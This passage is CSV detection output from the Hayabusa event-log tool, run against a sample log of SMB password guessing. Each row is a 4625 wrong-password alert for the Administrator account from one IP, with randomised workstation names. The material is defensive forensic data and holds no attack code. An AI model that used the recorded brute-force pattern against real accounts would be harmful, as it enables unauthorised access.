NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: 